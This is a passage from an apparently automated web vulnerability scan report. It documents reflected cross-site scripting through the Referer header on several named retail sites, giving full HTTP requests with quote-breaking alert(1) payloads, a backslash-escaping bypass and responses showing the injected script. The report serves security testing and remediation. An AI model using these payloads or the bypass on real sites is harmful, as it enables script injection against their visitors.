Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET / HTTP/1.1
Host: www.berries.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fdcde\"%3balert(1)//64278522827

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=ucvxcqjbmzennz4olztdt1wc; domain=berries.com; path=/
Set-Cookie: ASP.NET_SessionId=ucvxcqjbmzennz4olztdt1wc; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_SSS=TestAssignmentValues=nta-1,sjt-1,xsa-1,nte-2,sps-1,ntb-2,sin-1,ntc-2,sat-3,sfl-1,xsb-1,srl-2,sjs-2,szc-2,mpsmediapersonalitysplit-2,szt-1,ntd-2,svo-1,sho-1; domain=.berries.com; expires=Mon, 16-Jan-2012 19:57:49 GMT; path=/
Set-Cookie: CURRENTSESSION_SSS=TestConfigDateTimeUpdated=12/16/2010 11:57:49 AM; domain=.berries.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=114; domain=.berries.com; expires=Sun, 19-Dec-2010 19:57:49 GMT; path=/
Set-Cookie: SSS_BrowserId=00de5e78-36e8-494f-8d70-0ea5a2771c47; domain=.berries.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: SSS_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.berries.com; path=/
Set-Cookie: SSS_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:49 GMT
Connection: close
Content-Length: 151649


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/
...[SNIP]...
f ("" == "EligibleProspect" || "" == "MembershipExpired" || "" == "OptOutFromProgram" || "" == "SignupForProgram") {
s.prop30 = "sss:GSOff:land";
}
}

s.campaign="sssorganicgglgeneric_fdcde\\";alert(1)//64278522827";
s.eVar1="sssorganicgglgeneric_fdcde\\";alert(1)//64278522827";
s.eVar2="sssorganicgglgeneric_fdcde\\";alert(1)//64278522827";
s.eVar3="sssorganicgglgeneric_fdcde\\";alert(1)//64278522827";
s.eVa
...[SNIP]...

2.203. http://www.berries.com/default.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.berries.com
Path:   /default.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9171d\"%3balert(1)//02962bf68af was submitted in the Referer HTTP header. This input was echoed as 9171d\\";alert(1)//02962bf68af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /default.aspx HTTP/1.1
Host: www.berries.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9171d\"%3balert(1)//02962bf68af

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=qkrx2vf3z3aeum5tmningrke; domain=berries.com; path=/
Set-Cookie: ASP.NET_SessionId=qkrx2vf3z3aeum5tmningrke; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_SSS=TestAssignmentValues=nta-2,sjt-1,xsa-1,nte-2,sps-1,ntb-1,sin-1,ntc-2,sat-2,sfl-2,xsb-1,srl-1,sjs-3,szc-1,mpsmediapersonalitysplit-1,szt-1,ntd-2,svo-2,sho-1; domain=.berries.com; expires=Mon, 16-Jan-2012 19:57:48 GMT; path=/
Set-Cookie: CURRENTSESSION_SSS=TestConfigDateTimeUpdated=12/16/2010 11:57:48 AM; domain=.berries.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=92; domain=.berries.com; expires=Sun, 19-Dec-2010 19:57:48 GMT; path=/
Set-Cookie: SSS_BrowserId=2913335b-41a9-4553-b302-2e7c203b50df; domain=.berries.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: SSS_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.berries.com; path=/
Set-Cookie: SSS_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:49 GMT
Connection: close
Content-Length: 159464


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/
...[SNIP]...
f ("" == "EligibleProspect" || "" == "MembershipExpired" || "" == "OptOutFromProgram" || "" == "SignupForProgram") {
s.prop30 = "sss:GSOff:land";
}
}

s.campaign="sssorganicgglgeneric_9171d\\";alert(1)//02962bf68af";
s.eVar1="sssorganicgglgeneric_9171d\\";alert(1)//02962bf68af";
s.eVar2="sssorganicgglgeneric_9171d\\";alert(1)//02962bf68af";
s.eVar3="sssorganicgglgeneric_9171d\\";alert(1)//02962bf68af";
s.eVa
...[SNIP]...

2.204. http://www.cherrymoonfarms.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cherrymoonfarms.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71ec3\"%3balert(1)//c789b2abbf6 was submitted in the Referer HTTP header. This input was echoed as 71ec3\\";alert(1)//c789b2abbf6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET / HTTP/1.1
Host: www.cherrymoonfarms.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=71ec3\"%3balert(1)//c789b2abbf6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=uvhfelyllrw1c5mpokzfg3d0; domain=cherrymoonfarms.com; path=/
Set-Cookie: ASP.NET_SessionId=uvhfelyllrw1c5mpokzfg3d0; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_CMF=TestAssignmentValues=csc-2,chh-1,ntb-1,nta-2,mpsmediapersonalitysplit-2,xca-1,cjt-2,nte-2,ntd-2,cjs-3,ntc-2,xcb-1; domain=.cherrymoonfarms.com; expires=Mon, 16-Jan-2012 19:57:27 GMT; path=/
Set-Cookie: CURRENTSESSION_CMF=TestConfigDateTimeUpdated=12/16/2010 11:57:27 AM; domain=.cherrymoonfarms.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=104; domain=.cherrymoonfarms.com; expires=Sun, 19-Dec-2010 19:57:27 GMT; path=/
Set-Cookie: CMF_BrowserId=1cf142ac-5898-42ba-8654-816014204ef9; domain=.cherrymoonfarms.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: CMF_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.cherrymoonfarms.com; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:27 GMT
Connection: close
Content-Length: 89786


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
h") { if ("" == "EligibleProspect" || "" == "MembershipExpired" || "" == "OptOutFromProgram" || "" == "SignupForProgram") { s.prop30 = "cmf:GSOff:land"; }}s.campaign="cmforganicgglgeneric_71ec3\\";alert(1)//c789b2abbf6";s.eVar1="cmforganicgglgeneric_71ec3\\";alert(1)//c789b2abbf6";s.eVar2="cmforganicgglgeneric_71ec3\\";alert(1)//c789b2abbf6";s.eVar3="cmforganicgglgeneric_71ec3\\";alert(1)//c789b2abbf6";s.eVar4="cmf"
...[SNIP]...

2.205. http://www.cherrymoonfarms.com/default.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cherrymoonfarms.com
Path:   /default.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 579e9\"%3balert(1)//2eeb5106408 was submitted in the Referer HTTP header. This input was echoed as 579e9\\";alert(1)//2eeb5106408 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /default.aspx HTTP/1.1
Host: www.cherrymoonfarms.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=579e9\"%3balert(1)//2eeb5106408

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=jbtwpc5eiuq0ilipemdyykgh; domain=cherrymoonfarms.com; path=/
Set-Cookie: ASP.NET_SessionId=jbtwpc5eiuq0ilipemdyykgh; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_CMF=TestAssignmentValues=csc-1,chh-1,ntb-1,nta-1,mpsmediapersonalitysplit-1,xca-1,cjt-1,nte-3,ntd-2,cjs-1,ntc-2,xcb-1; domain=.cherrymoonfarms.com; expires=Mon, 16-Jan-2012 19:57:27 GMT; path=/
Set-Cookie: CURRENTSESSION_CMF=TestConfigDateTimeUpdated=12/16/2010 11:57:27 AM; domain=.cherrymoonfarms.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=18; domain=.cherrymoonfarms.com; expires=Sun, 19-Dec-2010 19:57:27 GMT; path=/
Set-Cookie: CMF_BrowserId=37ff7ccd-c8bb-4a04-93cd-113925dc30aa; domain=.cherrymoonfarms.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: CMF_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.cherrymoonfarms.com; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 19:57:26 GMT
Connection: close
Content-Length: 89305


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
h") { if ("" == "EligibleProspect" || "" == "MembershipExpired" || "" == "OptOutFromProgram" || "" == "SignupForProgram") { s.prop30 = "cmf:GSOff:land"; }}s.campaign="cmforganicgglgeneric_579e9\\";alert(1)//2eeb5106408";s.eVar1="cmforganicgglgeneric_579e9\\";alert(1)//2eeb5106408";s.eVar2="cmforganicgglgeneric_579e9\\";alert(1)//2eeb5106408";s.eVar3="cmforganicgglgeneric_579e9\\";alert(1)//2eeb5106408";s.eVar4="cmf"
...[SNIP]...

2.206. https://www.llbean.com/webapp/wcs/stores/servlet/LLBLoginRedirectCmd [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.llbean.com
Path:   /webapp/wcs/stores/servlet/LLBLoginRedirectCmd

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1007"><a>fe2b2cebad1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /webapp/wcs/stores/servlet/LLBLoginRedirectCmd HTTP/1.1
Host: www.llbean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: Foresee_orderThanks=0; llbgn=507175-GN1~1~0~Relevance~-1~-1~^919*Holiday Gift Shop^507175*Gifts for $30 & Under; s_cc=true; LLBNavURL=85|/llb/shop/507175?qs=3037432-F10_1122_BBCO_HLDY|0|http://www.llbean.com/llb/shop/507175?qs=3037432-F10_1122_BBCO_HLDY; TS6e35ec=cad4b6761140733ecbb1769a86989e8b69b786e118c020874d0a6d57; LLBEAN=3037432-F10_1122_BBCO_HLDY:1:1292528983:1292528983:A0A64C91500002CF24D0A6D574FDD:1292528983:; s_vi=[CS]v1|268536AB8515AB91-600001746028C850[CE]; s_sq=%5B%5BB%5D%5D; Foresee_bagFlag=0; FSRCookie=FSRsection=Browse||currentURL=http%3A//www.llbean.com/llb/shop/507175%3Fqs%3D3037432-F10_1122_BBCO_HLDY||ForeseeLoyalty=1; Foresee_visitorID=A0A64C91500002CF24D0A6D574FDD;
Referer: http://www.google.com/search?hl=en&q=a1007"><a>fe2b2cebad1

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELa TRo IND PHY ONL UNI PUR FIN COM NAV DEM STA", policyref="/w3c/p3p.xml"
Content-Type: text/html; charset=iso-8859-1
Content-Language: en-US
Date: Thu, 16 Dec 2010 20:04:50 GMT
Content-Length: 3686
Connection: close
Set-Cookie: JSESSIONID=0000Q0UepHrGxsnJKHdM9J1FuoF:153se8jg0; Path=/
Set-Cookie: TS6e35ec=8b1e09364044296c9fa16c9c67c429cb69b786e118c020874d0a70e2; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


                <script type="text/javascript">
cssPath =
...[SNIP]...
<meta http-equiv="Refresh" content="0;url=http://www.llbean.com/error.html?url=/webapp/wcs/stores/llbean/LLBeanError.jsp&rf=http://www.google.com/search?hl=en&q=a1007"><a>fe2b2cebad1&extyp=1&msgky=_ERR_BAD_MISSING_CMD_PARAMETER&msg=There+was+a+bad+or+missing+parameter%3A+%7B0%7D.&sysmsg=&origcmd=" />
...[SNIP]...

2.207. http://www.personalcreations.com/default.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf382\"%3balert(1)//f6c1d92f3a8 was submitted in the Referer HTTP header. This input was echoed as cf382\\";alert(1)//f6c1d92f3a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /default.aspx HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cf382\"%3balert(1)//f6c1d92f3a8

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=fznubh2bufrveyxu41leplbm; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=fznubh2bufrveyxu41leplbm; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,ttb-1,ttl-1,tjt-2,tjs-1,tpr-1,tmc-1,ntb-2,ntc-1,xtc-1,tpp-2,nte-3,ntd-2,xta-1,tsh-2,tin-1,tmm-2,mpsmediapersonalitysplit-2,xtb-1,tem-2,tln-1,tvo-1,tps-2,tpf-1; domain=.personalcreations.com; expires=Mon, 16-Jan-2012 20:05:12 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=12/16/2010 12:05:12 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=204.51.113.169; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=113; domain=.personalcreations.com; expires=Sun, 19-Dec-2010 20:05:12 GMT; path=/
Set-Cookie: PCR_BrowserId=69350d58-b2de-4ea8-951a-9f5a17ddbb89; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Dec 2010 20:05:12 GMT
Connection: close
Content-Length: 129341


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/clien
...[SNIP]...
f ("" == "EligibleProspect" || "" == "MembershipExpired" || "" == "OptOutFromProgram" || "" == "SignupForProgram") {
s.prop30 = "pcr:GSOff:land";
}
}

s.campaign="pcrorganicgglgeneric_cf382\\";alert(1)//f6c1d92f3a8";
s.eVar1="pcrorganicgglgeneric_cf382\\";alert(1)//f6c1d92f3a8";
s.eVar2="pcrorganicgglgeneric_cf382\\";alert(1)//f6c1d92f3a8";
s.eVar3="pcrorganicgglgeneric_cf382\\";alert(1)//f6c1d92f3a8";
s.eVa
...[SNIP]...

2.208. http://www.proflowers.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36981\"%3balert(1)//997195d5292 was submitted in the Referer HTTP header. This input was echoed as 36981\\";alert(1)//997195d5292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two ba